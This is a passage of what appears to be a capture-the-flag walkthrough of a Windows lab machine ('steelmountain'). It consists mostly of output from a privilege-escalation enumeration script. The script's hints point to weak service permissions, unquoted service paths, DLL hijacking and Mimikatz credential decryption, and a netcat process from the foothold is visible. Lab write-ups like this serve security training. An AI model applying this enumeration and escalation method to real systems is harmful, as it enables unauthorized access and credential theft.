smss.exe                       356 N/A                                         
csrss.exe                      496 N/A                                         
csrss.exe                      548 N/A                                         
wininit.exe                    576 N/A                                         
winlogon.exe                   584 N/A                                         
services.exe                   644 N/A                                         
lsass.exe                      652 SamSs                                       
svchost.exe                    708 BrokerInfrastructure, DcomLaunch, LSM,      
                                   PlugPlay, Power, SystemEventsBroker         
svchost.exe                    736 RpcEptMapper, RpcSs                         
ASCService.exe                 836 AdvancedSystemCareService9                  
dwm.exe                        844 N/A                                         
svchost.exe                    948 Dhcp, EventLog, lmhosts, Wcmsvc             
svchost.exe                   1000 CertPropSvc, DsmSvc, gpsvc, IKEEXT,         
                                   iphlpsvc, LanmanServer, ProfSvc, Schedule,  
                                   SENS, SessionEnv, ShellHWDetection, Themes, 
                                   Winmgmt                                     
svchost.exe                     56 EventSystem, FontCache, netprofm, nsi,      
                                   W32Time, WinHttpAutoProxySvc                
svchost.exe                    540 CryptSvc, Dnscache, LanmanWorkstation,      
                                   NlaSvc, WinRM                               
svchost.exe                   1056 BFE, DPS, MpsSvc                            
spoolsv.exe                   1204 Spooler                                     
amazon-ssm-agent.exe          1232 AmazonSSMAgent                              
svchost.exe                   1300 AppHostSvc                                  
LiteAgent.exe                 1324 AWSLiteAgent                                
LiveUpdate.exe                1444 LiveUpdateSvc                               
svchost.exe                   1496 TrkWks, UALSVC, UmRdpService                
svchost.exe                   1516 W3SVC, WAS                                  
wlms.exe                      1560 WLMS                                        
Ec2Config.exe                 1700 Ec2Config                                   
sppsvc.exe                    1976 sppsvc                                      
svchost.exe                   2020 TermService                                 
svchost.exe                   1156 PolicyAgent                                 
vds.exe                       1164 vds                                         
WmiPrvSE.exe                  2424 N/A                                         
taskhostex.exe                2664 N/A                                         
explorer.exe                  2736 N/A                                         
SppExtComObj.Exe              1868 N/A                                         
hfs.exe                       2152 N/A                                         
msdtc.exe                     3956 MSDTC                                       
nc.exe                        2672 N/A                                         
conhost.exe                    616 N/A                                         
cmd.exe                       3936 N/A                                         
WmiPrvSE.exe                  3480 N/A                                         
WmiPrvSE.exe                  2868 N/A                                         
TrustedInstaller.exe          3724 TrustedInstaller                            
TiWorker.exe                  3732 N/A                                         
tasklist.exe                  2608 N/A                                         

[i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in)
C:\Windows\Explorer.EXE NT SERVICE\TrustedInstaller:(F)

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hfs.exe NT AUTHORITY\SYSTEM:(F)
                                                                                    STEELMOUNTAIN\bill:(F)

C:\Users\Public\nc.exe BUILTIN\Administrators:(I)(F)
                       STEELMOUNTAIN\bill:(I)(F)

C:\Windows\SysWOW64\cmd.exe NT SERVICE\TrustedInstaller:(F)

C:\Windows\SysWOW64\cmd.exe NT SERVICE\TrustedInstaller:(F)

C:\Windows\SysWOW64\Wbem\WMIC.exe NT SERVICE\TrustedInstaller:(F)


[i] Checking directory permissions of running processes (DLL injection)
C:\Windows\ NT SERVICE\TrustedInstaller:(F)

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                                                             STEELMOUNTAIN\bill:(OI)(CI)(F)

C:\Users\Public\ BUILTIN\Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\ NT SERVICE\TrustedInstaller:(F)

C:\Windows\SysWOW64\ NT SERVICE\TrustedInstaller:(F)

C:\Windows\SysWOW64\wbem\ NT SERVICE\TrustedInstaller:(F)

C:\Windows\SysWOW64\ NT SERVICE\TrustedInstaller:(F)

C:\Windows\SysWOW64\ NT SERVICE\TrustedInstaller:(F)

C:\Windows\SysWOW64\ NT SERVICE\TrustedInstaller:(F)



_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] RUN AT STARTUP <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] AlwaysInstallElevated? <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] If '1' then you can install a .msi file with admin privileges ;)
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated



_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [*] NETWORK <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] CURRENT SHARES <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share                     
IPC$                                         Remote IPC                        
ADMIN$       C:\Windows                      Remote Admin                      
The command completed successfully.



_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] INTERFACES <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Windows IP Configuration

   Host Name . . . . . . . . . . . . : steelmountain
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : eu-west-1.ec2-utilities.amazonaws.com
                                       eu-west-1.compute.internal

Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Description . . . . . . . . . . . : AWS PV Network Device #0
   Physical Address. . . . . . . . . : 02-99-D1-4B-82-FC
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::841b:4ca5:ba80:80a3%14(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.10.247.243(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Friday, June 5, 2020 11:03:18 PM
   Lease Expires . . . . . . . . . . : Saturday, June 6, 2020 12:03:18 AM
   Default Gateway . . . . . . . . . : 10.10.0.1
   DHCP Server . . . . . . . . . . . : 10.10.0.1
   DHCPv6 IAID . . . . . . . . . . . : 335944513
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-20-00-54-08-00-27-EA-60-57
   DNS Servers . . . . . . . . . . . : 10.0.0.2
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.eu-west-1.compute.internal:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] USED PORTS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check for services restricted from the outside
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       736
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       2020
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2152
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       576
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       1000
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       1204
  TCP    0.0.0.0:49159          0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:49161          0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:49162          0.0.0.0:0              LISTENING       1156
  TCP    10.10.247.243:139      0.0.0.0:0              LISTENING       4
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       736
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:3389              [::]:0                 LISTENING       2020
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       576
  TCP    [::]:49153             [::]:0                 LISTENING       948
  TCP    [::]:49154             [::]:0                 LISTENING       1000
  TCP    [::]:49155             [::]:0                 LISTENING       1204
  TCP    [::]:49159             [::]:0                 LISTENING       652
  TCP    [::]:49161             [::]:0                 LISTENING       644
  TCP    [::]:49162             [::]:0                 LISTENING       1156


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] FIREWALL <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Firewall status:
-------------------------------------------------------------------
Profile                           = Standard
Operational mode                  = Disable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Disable
Group policy version              = Windows Firewall
Remote admin mode                 = Disable

Ports currently open on all network interfaces:
Port   Protocol  Version  Program
-------------------------------------------------------------------
No ports are currently open on all network interfaces.

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .



Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Disable

Service configuration for Domain profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          Remote Desktop

Allowed programs configuration for Domain profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Domain profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Domain profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Disable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Disable

Service configuration for Standard profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          Remote Desktop

Allowed programs configuration for Standard profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Standard profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Standard profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Log configuration:
-------------------------------------------------------------------
File location   = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size   = 4096 KB
Dropped packets = Disable
Connections     = Disable

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .




_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] ARP <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Interface: 10.10.247.243 --- 0xe
  Internet Address      Physical Address      Type
  10.10.0.1             02-c8-85-b5-5a-aa     dynamic   
  10.10.255.255         ff-ff-ff-ff-ff-ff     static    
  169.254.169.254       02-c8-85-b5-5a-aa     dynamic   
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  255.255.255.255       ff-ff-ff-ff-ff-ff     static    


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] ROUTES <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
===========================================================================
Interface List
 14...02 99 d1 4b 82 fc ......AWS PV Network Device #0
  1...........................Software Loopback Interface 1
 24...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0        10.10.0.1    10.10.247.243     10
        10.10.0.0      255.255.0.0         On-link     10.10.247.243    266
    10.10.247.243  255.255.255.255         On-link     10.10.247.243    266
    10.10.255.255  255.255.255.255         On-link     10.10.247.243    266
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  169.254.169.123  255.255.255.255        10.10.0.1    10.10.247.243     10
  169.254.169.249  255.255.255.255        10.10.0.1    10.10.247.243     10
  169.254.169.250  255.255.255.255        10.10.0.1    10.10.247.243     10
  169.254.169.251  255.255.255.255        10.10.0.1    10.10.247.243     10
  169.254.169.253  255.255.255.255        10.10.0.1    10.10.247.243     10
  169.254.169.254  255.255.255.255        10.10.0.1    10.10.247.243     10
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link     10.10.247.243    266
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link     10.10.247.243    266
===========================================================================
Persistent Routes:
  None

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    306 ::1/128                  On-link
 14    266 fe80::/64                On-link
 14    266 fe80::841b:4ca5:ba80:80a3/128
                                    On-link
  1    306 ff00::/8                 On-link
 14    266 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Hosts file <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-



_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] CACHE DNS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] WIFI <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
The system cannot find the file specified.
The following command was not found: wlan show profile.



_-_-_-_-_-_-_-_-_-_-_-_-_-_-_->[*] BASIC USER INFO <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] CURRENT USER <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
User name                    bill
Full Name                    Bill Harper
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/26/2019 11:26:45 PM
Password expires             Never
Password changeable          9/26/2019 11:26:45 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   6/5/2020 11:03:34 PM

Logon hours allowed          All

Local Group Memberships      *Users                
Global Group memberships     *None                 
The command completed successfully.

The request will be processed at a domain controller for domain WORKGROUP.


USER INFORMATION
----------------

User Name          SID                                           
================== ==============================================
steelmountain\bill S-1-5-21-3029548963-3893655183-1231094572-1001


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

ERROR: Unable to get user claims information.


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] USERS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

User accounts for \\STEELMOUNTAIN

-------------------------------------------------------------------------------
Administrator            bill                     Guest                    
The command completed successfully.



_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] GROUPS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Aliases for \\STEELMOUNTAIN

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Users
*WinRMRemoteWMIUsers__
The command completed successfully.



_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] ADMINISTRATORS GROUPS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

 

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] CURRENT LOGGED USERS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>bill                  console             1  Active      none   6/5/2020 11:03 PM
 

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Kerberos Tickets <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Current LogonId is 0:0x29129

Cached Tickets: (0)
 

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] CURRENT CLIPBOARD <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Any password inside the clipboard?



_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [*] SERVICES VULNERABILITIES <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] SERVICE BINARY PERMISSIONS WITH WMIC + ICACLS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe STEELMOUNTAIN\bill:(I)(RX,W)

C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe NT AUTHORITY\SYSTEM:(I)(F)

C:\Program Files\Amazon\XenTools\LiteAgent.exe NT AUTHORITY\SYSTEM:(I)(F)

C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe NT AUTHORITY\SYSTEM:(I)(F)

C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe STEELMOUNTAIN\bill:(I)(RX,W)

C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe STEELMOUNTAIN\bill:(I)(RX,W)

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe NT SERVICE\TrustedInstaller:(F)

C:\Windows\SysWow64\perfhost.exe NT SERVICE\TrustedInstaller:(F)

C:\Windows\PSSDNSVC.EXE NT AUTHORITY\SYSTEM:(I)(F)

C:\Windows\servicing\TrustedInstaller.exe NT SERVICE\TrustedInstaller:(F)



_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] UNQUOTED SERVICE PATHS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
[i] The permissions are also checked and filtered using icacls
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
AdvancedSystemCareService9 
 C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe 
Invalid parameter "Files"
AWSLiteAgent 
 C:\Program Files\Amazon\XenTools\LiteAgent.exe 
Invalid parameter "Files\Amazon\XenTools\LiteAgent.exe"
IObitUnSvr 
 C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe 
Invalid parameter "Files"
LiveUpdateSvc 
 C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe 
Invalid parameter "Files"
NetTcpPortSharing 
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe NT SERVICE\TrustedInstaller:(F)

PerfHost 
 C:\Windows\SysWow64\perfhost.exe 
C:\Windows\SysWow64\perfhost.exe NT SERVICE\TrustedInstaller:(F)

PsShutdownSvc 
 C:\Windows\PSSDNSVC.EXE 
C:\Windows\PSSDNSVC.EXE NT AUTHORITY\SYSTEM:(I)(F)

TrustedInstaller 
 C:\Windows\servicing\TrustedInstaller.exe 
C:\Windows\servicing\TrustedInstaller.exe NT SERVICE\TrustedInstaller:(F)




_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [*] DLL HIJACKING in PATHenv variable <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
[i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking
C:\Windows\system32 NT SERVICE\TrustedInstaller:(F)
 
C:\Windows NT SERVICE\TrustedInstaller:(F)
 
C:\Windows\System32\Wbem NT SERVICE\TrustedInstaller:(F)
 



_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [*] CREDENTIALS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] WINDOWS VAULT <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault

Currently stored credentials:

    Target: LegacyGeneric:target=STEELMOUNTAIN\bill
    Type: Generic 
    User: STEELMOUNTAIN\bill
    


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] DPAPI MASTER KEYS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi


    Directory: C:\Users\bill\AppData\Roaming\Microsoft\Protect


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
d---s         9/26/2019  11:29 PM            S-1-5-21-3029548963-3893655183-123
                                             1094572-1001                      




_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] DPAPI MASTER KEYS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
[i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
Looking inside C:\Users\bill\AppData\Roaming\Microsoft\Credentials\
16E038FE7CEF476A77403E8E0EE760B8
Looking inside C:\Users\bill\AppData\Local\Microsoft\Credentials\


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Unattended files <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] SAM 
'SYSTEM' is not recognized as an internal or external command,
operable program or batch file.


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] McAffe SiteList.xml <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A
File Not Found
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A
File Not Found
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A
File Not Found
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A
File Not Found


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] GPP Password <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
The system cannot find the path specified.
File Not Found
The system cannot find the path specified.
File Not Found


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Cloud Creds <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
File Not Found
File Not Found


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] AppCmd <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
C:\Windows\system32\inetsrv\appcmd.exe exists. 


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Files an registry that may contain credentials <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Searching specific files that may contains credentials.
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    DefaultDomainName    REG_SZ    
    DefaultUserName    REG_SZ    
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
    W3SVC    REG_SZ    Software\Microsoft\W3SVC\CurrentVersion

Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
File Not Found



C:\>

We could have used powershell to list the services, as follows:

C:\>powershell -c Get-Service
powershell -c Get-Service

Status   Name               DisplayName                           
------   ----               -----------                           
Running  AdvancedSystemC... Advanced SystemCare Service 9         
Stopped  AeLookupSvc        Application Experience                
Stopped  ALG                Application Layer Gateway Service     
Running  AmazonSSMAgent     Amazon SSM Agent                      
Running  AppHostSvc         Application Host Helper Service       
Stopped  AppIDSvc           Application Identity                  
Stopped  Appinfo            Application Information               
Stopped  AppMgmt            Application Management                
Stopped  AppReadiness       App Readiness                         
Stopped  AppXSvc            AppX Deployment Service (AppXSVC)     
Stopped  AudioEndpointBu... Windows Audio Endpoint Builder        
Stopped  Audiosrv           Windows Audio                         
Running  AWSLiteAgent       AWS Lite Guest Agent                  
Running  BFE                Base Filtering Engine                 
Stopped  BITS               Background Intelligent Transfer Ser...
Running  BrokerInfrastru... Background Tasks Infrastructure Ser...
Stopped  Browser            Computer Browser                      
Running  CertPropSvc        Certificate Propagation               
Stopped  COMSysApp          COM+ System Application               
Running  CryptSvc           Cryptographic Services                
Running  DcomLaunch         DCOM Server Process Launcher          
Stopped  defragsvc          Optimize drives                       
Stopped  DeviceAssociati... Device Association Service            
Stopped  DeviceInstall      Device Install Service                
Running  Dhcp               DHCP Client                           
Running  Dnscache           DNS Client                            
Stopped  dot3svc            Wired AutoConfig                      
Running  DPS                Diagnostic Policy Service             
Running  DsmSvc             Device Setup Manager                  
Stopped  Eaphost            Extensible Authentication Protocol    
Running  Ec2Config          Ec2Config                             
Stopped  EFS                Encrypting File System (EFS)          
Running  EventLog           Windows Event Log                     
Running  EventSystem        COM+ Event System                     
Stopped  fdPHost            Function Discovery Provider Host      
